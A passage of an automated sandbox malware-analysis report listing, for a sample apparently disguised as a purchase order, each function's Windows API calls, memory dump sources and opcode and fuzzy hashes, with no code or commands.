                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                  Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                  • __itow.LIBCMT ref: 004699CD
                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                  • __itow.LIBCMT ref: 00469A97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$__itow
                                  • String ID:
                                  • API String ID: 3379773720-0
                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                  Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                  • String ID:
                                  • API String ID: 3321077145-0
                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                  Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                  • TranslateMessage.USER32(?), ref: 00442B01
                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • GetCaretPos.USER32(?), ref: 004743B2
                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                  • GetForegroundWindow.USER32 ref: 004743EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                  • String ID:
                                  • API String ID: 2759813231-0
                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                  Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                  • _wcslen.LIBCMT ref: 00449519
                                  • _wcslen.LIBCMT ref: 00449526
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend_wcslen$_wcspbrk
                                  • String ID:
                                  • API String ID: 2886238975-0
                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                  Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __setmode$DebugOutputString_fprintf
                                  • String ID:
                                  • API String ID: 1792727568-0
                                  • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                  • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                  Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • 742845F0.USER32(?,000000EC,?,00000001), ref: 0047A2DF
                                  • 742859E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A2FA
                                  • 742859E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A312
                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 742859Window$742845AttributesLayered
                                  • String ID:
                                  • API String ID: 4121519411-0
                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                  Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                  • _memmove.LIBCMT ref: 0046D475
                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                  • String ID:
                                  • API String ID: 2502553879-0
                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                  Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32 ref: 00448C69
                                  • 742845F0.USER32(?,000000EC), ref: 00448C91
                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$742845
                                  • String ID:
                                  • API String ID: 1730662999-0
                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                  Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                  Memory Dump Source
